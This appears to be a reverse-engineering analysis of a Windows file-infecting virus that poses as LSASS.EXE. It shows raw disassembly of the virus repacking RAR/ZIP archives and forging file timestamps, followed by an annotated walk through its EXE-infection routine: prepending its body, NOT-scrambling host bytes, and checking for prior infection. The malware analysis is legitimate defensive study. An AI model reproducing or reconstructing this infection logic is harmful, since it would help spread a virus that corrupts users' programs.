0040269A |. E8 8F5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040269F |. 68 08D14000 |PUSH LSASS.0040D108
004026A4 |. 50 |PUSH EAX
004026A5 |. 8D45 94 |LEA EAX,DWORD PTR SS:[EBP-6C]
004026A8 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19
004026AC |. 50 |PUSH EAX
004026AD |. E8 7C5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004026B2 |. 50 |PUSH EAX
004026B3 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
004026B6 |. C645 FC 1A |MOV BYTE PTR SS:[EBP-4],1A
004026BA |. E8 635F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004026BF |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]
004026C2 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19
004026C6 |. E8 315E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026CB |. 8D8D 54FFFFFF |LEA ECX,DWORD PTR SS:[EBP-AC]
004026D1 |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18
004026D5 |. E8 225E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026DA |. 8D8D 7CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-84]
004026E0 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
004026E4 |. E8 135E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026E9 |. 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]
004026EC |. 50 |PUSH EAX
004026ED |. 8D85 6CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-94]
004026F3 |. 68 8CD14000 |PUSH LSASS.0040D18C ; ASCII " X ""
004026F8 |. 50 |PUSH EAX
004026F9 |. E8 365F0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>
004026FE |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""
00402703 |. 50 |PUSH EAX
00402704 |. 8D85 4CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-B4]
0040270A |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B
0040270E |. 50 |PUSH EAX
0040270F |. E8 1A5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402714 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
00402717 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C
0040271B |. 51 |PUSH ECX
0040271C |. 50 |PUSH EAX
0040271D |. 8D85 74FFFFFF |LEA EAX,DWORD PTR SS:[EBP-8C]
00402723 |. 50 |PUSH EAX
00402724 |. E8 FF5E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
00402729 |. 68 74D14000 |PUSH LSASS.0040D174 ; ASCII "" -r -inul -ibck -y"
0040272E |. 50 |PUSH EAX
0040272F |. 8D85 3CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-C4]
00402735 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D
00402739 |. 50 |PUSH EAX
0040273A |. E8 EF5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040273F |. C645 FC 1E |MOV BYTE PTR SS:[EBP-4],1E
00402743 |. 50 |PUSH EAX
00402744 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]
00402747 |. E8 D65E0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
0040274C |. 8D8D 3CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-C4]
00402752 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D
00402756 |. E8 A15D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040275B |. 8D8D 74FFFFFF |LEA ECX,DWORD PTR SS:[EBP-8C]
00402761 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C
00402765 |. E8 925D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040276A |. 8D8D 4CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-B4]
00402770 |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B
00402774 |. E8 835D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402779 |. 8D8D 6CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-94]
0040277F |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402783 |. E8 745D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402788 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
0040278B |. 50 |PUSH EAX
0040278C |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]
00402792 |. 50 |PUSH EAX
00402793 |. 8D85 38FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C8]
00402799 |. 50 |PUSH EAX
0040279A |. E8 895E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
0040279F |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src
004027A1 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004027A7 |. 50 |PUSH EAX ; |dest
004027A8 |. E8 5F5F0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy
004027AD |. 59 |POP ECX
004027AE |. 59 |POP ECX
004027AF |. 8D8D 38FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C8]
004027B5 |. E8 425D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004027BA |. 53 |PUSH EBX ; /Arg5
004027BB |. 53 |PUSH EBX ; |Arg4
004027BC |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004027C2 |. 53 |PUSH EBX ; |Arg3
004027C3 |. 50 |PUSH EAX ; |Arg2
004027C4 |. 53 |PUSH EBX ; |Arg1
004027C5 |. 8BCE |MOV ECX,ESI ; |
004027C7 |. E8 2F410000 |CALL LSASS.004068FB ; /LSASS.004068FB
004027CC |. 85C0 |TEST EAX,EAX ; unpack rar/zip file
004027CE |. 74 40 |JE SHORT LSASS.00402810
004027D0 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
004027D5 |. 8D85 64FFFFFF |LEA EAX,DWORD PTR SS:[EBP-9C]
004027DB |. 57 |PUSH EDI
004027DC |. 50 |PUSH EAX
004027DD |. E8 4C5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004027E2 |. 51 |PUSH ECX
004027E3 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
004027E9 |. 8BCC |MOV ECX,ESP
004027EB |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
004027EE |. 52 |PUSH EDX
004027EF |. 50 |PUSH EAX
004027F0 |. 51 |PUSH ECX
004027F1 |. C645 FC 1F |MOV BYTE PTR SS:[EBP-4],1F
004027F5 |. E8 345E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004027FA |. 8BCE |MOV ECX,ESI
004027FC |. E8 E0F5FFFF |CALL LSASS.00401DE1
00402801 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402805 |. 8D8D 64FFFFFF |LEA ECX,DWORD PTR SS:[EBP-9C]
0040280B |. E9 B5020000 |JMP LSASS.00402AC5
00402810 |> A1 08F44000 |MOV EAX,DWORD PTR DS:[40F408]
00402815 |. 51 |PUSH ECX
00402816 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX
00402819 |. A1 04F44000 |MOV EAX,DWORD PTR DS:[40F404]
0040281E |. FF86 AA010000 |INC DWORD PTR DS:[ESI+1AA]
00402824 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX
00402827 |. 8D45 DC |LEA EAX,DWORD PTR SS:[EBP-24]
0040282A |. 8BCC |MOV ECX,ESP
0040282C |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
0040282F |. 50 |PUSH EAX
00402830 |. E8 D55D0000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00402835 |. 8BCE |MOV ECX,ESI
00402837 |. E8 85F8FFFF |CALL LSASS.004020C1
0040283C |. 8B45 D0 |MOV EAX,DWORD PTR SS:[EBP-30]
0040283F |. 3905 04F44000 |CMP DWORD PTR DS:[40F404],EAX
00402845 |. 7F 4B |JG SHORT LSASS.00402892
00402847 |. 8B45 E4 |MOV EAX,DWORD PTR SS:[EBP-1C]
0040284A |. 3905 08F44000 |CMP DWORD PTR DS:[40F408],EAX
00402850 |. 7F 40 |JG SHORT LSASS.00402892
00402852 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
00402857 |. 8D85 5CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-A4]
0040285D |. 57 |PUSH EDI
0040285E |. 50 |PUSH EAX
0040285F |. E8 CA5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402864 |. 51 |PUSH ECX
00402865 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
0040286B |. 8BCC |MOV ECX,ESP
0040286D |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402870 |. 52 |PUSH EDX
00402871 |. 50 |PUSH EAX
00402872 |. 51 |PUSH ECX
00402873 |. C645 FC 26 |MOV BYTE PTR SS:[EBP-4],26
00402877 |. E8 B25D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040287C |. 8BCE |MOV ECX,ESI
0040287E |. E8 5EF5FFFF |CALL LSASS.00401DE1
00402883 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402887 |. 8D8D 5CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-A4]
0040288D |. E9 C2010000 |JMP LSASS.00402A54
00402892 |> 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]
00402895 |. 50 |PUSH EAX
00402896 |. 8D85 78FFFFFF |LEA EAX,DWORD PTR SS:[EBP-88]
0040289C |. 68 6CD14000 |PUSH LSASS.0040D16C ; ASCII " A ""
004028A1 |. 50 |PUSH EAX
004028A2 |. E8 8D5D0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>
004028A7 |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""
004028AC |. 50 |PUSH EAX
004028AD |. 8D45 80 |LEA EAX,DWORD PTR SS:[EBP-80]
004028B0 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20
004028B4 |. 50 |PUSH EAX
004028B5 |. E8 745D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004028BA |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
004028BD |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21
004028C1 |. 51 |PUSH ECX
004028C2 |. 50 |PUSH EAX
004028C3 |. 8D45 88 |LEA EAX,DWORD PTR SS:[EBP-78]
004028C6 |. 50 |PUSH EAX
004028C7 |. E8 5C5D0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
004028CC |. 68 44D14000 |PUSH LSASS.0040D144 ; ASCII "*.*" -r -inul -ibck -y -m0 -df -ep -ep1"
004028D1 |. 50 |PUSH EAX
004028D2 |. 8D45 90 |LEA EAX,DWORD PTR SS:[EBP-70]
004028D5 |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22
004028D9 |. 50 |PUSH EAX
004028DA |. E8 4F5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004028DF |. 50 |PUSH EAX
004028E0 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]
004028E3 |. C645 FC 23 |MOV BYTE PTR SS:[EBP-4],23
004028E7 |. E8 365D0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004028EC |. 8D4D 90 |LEA ECX,DWORD PTR SS:[EBP-70]
004028EF |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22
004028F3 |. E8 045C0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004028F8 |. 8D4D 88 |LEA ECX,DWORD PTR SS:[EBP-78]
004028FB |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21
004028FF |. E8 F85B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402904 |. 8D4D 80 |LEA ECX,DWORD PTR SS:[EBP-80]
00402907 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20
0040290B |. E8 EC5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402910 |. 8D8D 78FFFFFF |LEA ECX,DWORD PTR SS:[EBP-88]
00402916 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040291A |. E8 DD5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040291F |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]
00402925 |. 53 |PUSH EBX
00402926 |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX
00402929 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]
0040292F |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX
00402932 |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]
00402938 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX
0040293B |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]
00402941 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX
00402944 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]
0040294A |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX
0040294D |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]
00402953 |. 51 |PUSH ECX
00402954 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX
00402957 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
0040295D |. 8BC4 |MOV EAX,ESP
0040295F |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402962 |. 51 |PUSH ECX
00402963 |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]
00402966 |. 51 |PUSH ECX
00402967 |. 50 |PUSH EAX
00402968 |. E8 C15C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040296D |. E8 4FF4FFFF |CALL LSASS.00401DC1
00402972 |. 59 |POP ECX
00402973 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
00402976 |. 59 |POP ECX
00402977 |. 50 |PUSH EAX
00402978 |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]
0040297E |. 50 |PUSH EAX
0040297F |. 8D85 70FFFFFF |LEA EAX,DWORD PTR SS:[EBP-90]
00402985 |. 50 |PUSH EAX
00402986 |. E8 9D5C0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
0040298B |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src
0040298D |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
00402993 |. 50 |PUSH EAX ; |dest
00402994 |. E8 735D0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy
00402999 |. 59 |POP ECX
0040299A |. 59 |POP ECX
0040299B |. 8D8D 70FFFFFF |LEA ECX,DWORD PTR SS:[EBP-90]
004029A1 |. E8 565B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004029A6 |. 53 |PUSH EBX ; /Arg5
004029A7 |. 53 |PUSH EBX ; |Arg4
004029A8 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004029AE |. 53 |PUSH EBX ; |Arg3
004029AF |. 50 |PUSH EAX ; |Arg2
004029B0 |. 53 |PUSH EBX ; |Arg1
004029B1 |. 8BCE |MOV ECX,ESI ; |
004029B3 |. E8 433F0000 |CALL LSASS.004068FB ; /LSASS.004068FB
004029B8 |. 85C0 |TEST EAX,EAX ; pack rar/zip file
004029BA |. 75 5D |JNZ SHORT LSASS.00402A19
004029BC |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
004029BF |. E8 445B0000 |CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004029C4 |. 68 40D14000 |PUSH LSASS.0040D140 ; ASCII "ddd"
004029C9 |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
004029CC |. C645 FC 24 |MOV BYTE PTR SS:[EBP-4],24
004029D0 |. E8 475C0000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>
004029D5 |. 53 |PUSH EBX ; /hTemplateFile
004029D6 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL
004029DB |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING
004029DD |. 53 |PUSH EBX ; |pSecurity
004029DE |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004029E0 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004029E5 |. FF75 D8 |PUSH DWORD PTR SS:[EBP-28] ; |FileName
004029E8 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004029EE |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]
004029F1 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX
004029F4 |. 51 |PUSH ECX ; /pLastWrite
004029F5 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |
004029F8 |. 51 |PUSH ECX ; |pLastAccess
004029F9 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |
004029FC |. 51 |PUSH ECX ; |pCreationTime
004029FD |. 50 |PUSH EAX ; |hFile
004029FE |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime
00402A04 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C] ; /hObject
00402A07 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle
00402A0D |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
00402A10 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402A14 |. E8 E35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402A19 |> 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
00402A1E |. 8D85 68FFFFFF |LEA EAX,DWORD PTR SS:[EBP-98]
00402A24 |. 57 |PUSH EDI
00402A25 |. 50 |PUSH EAX
00402A26 |. E8 035C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402A2B |. 51 |PUSH ECX
00402A2C |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
00402A32 |. 8BCC |MOV ECX,ESP
00402A34 |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402A37 |. 52 |PUSH EDX
00402A38 |. 50 |PUSH EAX
00402A39 |. 51 |PUSH ECX
00402A3A |. C645 FC 25 |MOV BYTE PTR SS:[EBP-4],25
00402A3E |. E8 EB5B0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402A43 |. 8BCE |MOV ECX,ESI
00402A45 |. E8 97F3FFFF |CALL LSASS.00401DE1
00402A4A |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402A4E |. 8D8D 68FFFFFF |LEA ECX,DWORD PTR SS:[EBP-98]
00402A54 |> E8 A35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402A59 |. FF8E AA010000 |DEC DWORD PTR DS:[ESI+1AA]
00402A5F |. EB 69 |JMP SHORT LSASS.00402ACA
00402A61 |> 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000
00402A6B |. 73 5D |JNB SHORT LSASS.00402ACA
...
00402ABB |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402ABF |. 8D8D 60FFFFFF |LEA ECX,DWORD PTR SS:[EBP-A0]
00402AC5 |> E8 325A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402ACA |> 8D85 F4FDFFFF |LEA EAX,DWORD PTR SS:[EBP-20C]
00402AD0 |. 50 |PUSH EAX ; /pFindFileData
00402AD1 |. FF75 B8 |PUSH DWORD PTR SS:[EBP-48] ; |hFile
00402AD4 |. FF15 FCA04000 |CALL DWORD PTR DS:[<&KERNEL32.FindNextFileA>] ; /FindNextFileA
00402ADA |. 85C0 |TEST EAX,EAX
00402ADC |.^ 0F85 52F7FFFF /JNZ LSASS.00402234
00402AE2 |. FF75 B8 PUSH DWORD PTR SS:[EBP-48] ; /hSearch
00402AE5 |. FF15 F8A04000 CALL DWORD PTR DS:[<&KERNEL32.FindClose>] ; /FindClose
2 感染exe文件的函数 (EXE file infection routine, 00406348)
;-----------------------------------------------------------------------
; EXE infection routine  (thiscall, this = ESI)
; Builds the infected image in the temp file [ESI+17C] (opened "wb") as:
;   1. the virus body read from the path at [ESI+68] (per the analysis:
;      system32\Com\LSASS.EXE; 00406702 is said to patch its icon resource
;      in memory first - not visible here)
;   2. 4 bytes: st_size of the host [ESI+174]
;   3. 4 bytes: the CString object at EBP-24 (see note at 004064F3)
;   4. the host file; only its first [40D03C] bytes are transformed
;      (pass A: NOT the byte at [40D030]+9, then every 11th byte after it;
;      pass B: NOT every even-offset byte), the rest is copied verbatim
;   5. the file at [ESI+178]; its first [40D03C] bytes get pass B only
;   6. 4 bytes: [40D03C] (virus body size), also stored in [ESI+64]
; The "encryption" is a bitwise NOT, which is its own inverse: running
; the same passes again restores the host. A byte hit by both passes is
; flipped twice and ends up unchanged.
; Globals: [40D03C] = st_size of [ESI+68]; also the chunk size of every
;                     fread in this routine
;          [40D030] = start offset of pass A (set outside this routine)
;          [40F404] = EXE infection counter, incremented on success
; Returns AL = 1 only when 00403088 reports the host as already infected
;          (host untouched).  AL = 0 on success AND on every failure path,
;          so the caller must look at [ESI+1B3] (set to 1 on success).
; Copying the temp file back over the host is not done here (caller's
; job, per the surrounding analysis).
;-----------------------------------------------------------------------
00406348 /$ B8 94934000 MOV EAX,LSASS.00409394 ; EH registration record for _EH_prolog (EXE infection routine entry)
0040634D |. E8 AE230000 CALL <JMP.&MSVCRT._EH_prolog>
00406352 |. 83EC 3C SUB ESP,3C ; locals: struct _stat at EBP-48, CString at EBP-24, FILE*s at EBP-20/EBP-1C
00406355 |. 53 PUSH EBX
00406356 |. 56 PUSH ESI
00406357 |. 8BF1 MOV ESI,ECX ; ESI = this
00406359 |. 57 PUSH EDI
0040635A |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
0040635D |. E8 A6210000 CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> ; CString at EBP-24, default-constructed; never assigned in this routine
00406362 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 ; EH state = 0
00406366 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174] ; host (target) path, CString
0040636C |. 50 PUSH EAX
0040636D |. 8D8E 6C010000 LEA ECX,DWORD PTR DS:[ESI+16C]
00406373 |. E8 AA220000 CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z> ; [ESI+16C] = [ESI+174]
00406378 |. 8D45 B8 LEA EAX,DWORD PTR SS:[EBP-48] ; struct _stat (st_size at +0x14 = EBP-34)
0040637B |. 8D7E 68 LEA EDI,DWORD PTR DS:[ESI+68] ; inline char path at this+68; per the analysis: Com\LSASS.EXE (virus body)
0040637E |. 50 PUSH EAX ; /statbuf
0040637F |. 57 PUSH EDI ; |path
00406380 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat
00406386 |. 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; EAX = statbuf.st_size of the virus body
00406389 |. 59 POP ECX
0040638A |. 85C0 TEST EAX,EAX
0040638C |. 59 POP ECX
0040638D |. A3 3CD04000 MOV DWORD PTR DS:[40D03C],EAX ; [40D03C] = virus body size; every fread below uses it as the chunk size
00406392 |. 75 07 JNZ SHORT LSASS.0040639B
00406394 |> 32DB XOR BL,BL ; size 0 / malloc failed -> return 0
00406396 |. E9 13010000 JMP LSASS.004064AE
0040639B |> 50 PUSH EAX ; /size = virus body size
0040639C |. FF15 88A34000 CALL DWORD PTR DS:[<&MSVCRT.malloc>] ; /malloc
004063A2 |. 85C0 TEST EAX,EAX
004063A4 |. 59 POP ECX
004063A5 |. 8986 70010000 MOV DWORD PTR DS:[ESI+170],EAX ; [ESI+170] = work buffer, exactly one chunk ([40D03C] bytes) long
004063AB |.^ 74 E7 JE SHORT LSASS.00406394 ; NULL -> return 0
004063AD |. 68 E8D14000 PUSH LSASS.0040D1E8 ; /mode = "rb"
004063B2 |. 57 PUSH EDI ; |path = [ESI+68]
004063B3 |. 8B3D 84A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fopen>] ; |EDI = fopen from here on
004063B9 |. FFD7 CALL EDI ; /fopen
004063BB |. 59 POP ECX
004063BC |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX ; [EBP-20] = FILE* of the virus body
004063BF |. 85C0 TEST EAX,EAX
004063C1 |. 59 POP ECX
004063C2 |. 0F84 D7000000 JE LSASS.0040649F ; open failed -> free buffer, return 0
004063C8 |. 50 PUSH EAX ; /stream
004063C9 |. 8B1D 8CA34000 MOV EBX,DWORD PTR DS:[<&MSVCRT.fread>] ; |EBX = fread from here on
004063CF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; |n = virus body size (27004h = 159748 in the traced sample)
004063D5 |. 6A 01 PUSH 1 ; |size = 1
004063D7 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |buf
004063DD |. FFD3 CALL EBX ; /fread: the whole virus body into the buffer
004063DF |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; /stream
004063E2 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX ; |[EBP-18] = bytes read (becomes the running output byte count)
004063E5 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose
004063EB |. 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]
004063EE |. 83C4 14 ADD ESP,14
004063F1 |. 3B05 3CD04000 CMP EAX,DWORD PTR DS:[40D03C]
004063F7 |. 0F85 A2000000 JNZ LSASS.0040649F ; short read -> free buffer, return 0
004063FD |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174] ; host path (CString used as char*)
00406403 |. 8D4D B8 LEA ECX,DWORD PTR SS:[EBP-48]
00406406 |. 51 PUSH ECX ; /statbuf (same buffer reused: st_size at EBP-34 now = host size)
00406407 |. 50 PUSH EAX ; |path
00406408 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat
0040640E |. 59 POP ECX
0040640F |. 85C0 TEST EAX,EAX
00406411 |. 59 POP ECX
00406412 |. 0F85 74020000 JNZ LSASS.0040668C ; host _stat failed -> free buffer, return 0
00406418 |. 3945 CC CMP DWORD PTR SS:[EBP-34],EAX ; EAX == 0 here: is the host zero-length?
0040641B |. 0F84 6B020000 JE LSASS.0040668C ; empty host is skipped
00406421 |. 8BCE MOV ECX,ESI
00406423 |. E8 DA020000 CALL LSASS.00406702 ; per the analysis: loads/patches the icon resource of the in-memory body (not visible here)
00406428 |. 84C0 TEST AL,AL
0040642A |. 74 73 JE SHORT LSASS.0040649F ; FALSE -> free buffer, return 0
0040642C |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174] ; host path
00406432 |. 68 E8D14000 PUSH LSASS.0040D1E8 ; ASCII "rb"
00406437 |. 50 PUSH EAX
00406438 |. FFD7 CALL EDI ; fopen(host, "rb")
0040643A |. 59 POP ECX
0040643B |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; [EBP-1C] = FILE* of the host
0040643E |. 85C0 TEST EAX,EAX
00406440 |. 59 POP ECX
00406441 |. 74 5C JE SHORT LSASS.0040649F ; open failed -> free buffer, return 0
00406443 |. 51 PUSH ECX ; reserve a stack slot for a by-value CString argument
00406444 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]
0040644A |. 8BCC MOV ECX,ESP
0040644C |. 8965 E0 MOV DWORD PTR SS:[EBP-20],ESP
0040644F |. 50 PUSH EAX
00406450 |. E8 B5210000 CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z> ; CString(host path) constructed in place in that slot
00406455 |. E8 2ECCFFFF CALL LSASS.00403088 ; already-infected check on the host path (implementation not visible here)
0040645A |. 84C0 TEST AL,AL
0040645C |. 59 POP ECX
0040645D |. 74 1B JE SHORT LSASS.0040647A ; 0 = not yet infected -> go infect
0040645F |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406465 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
0040646B |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream = host
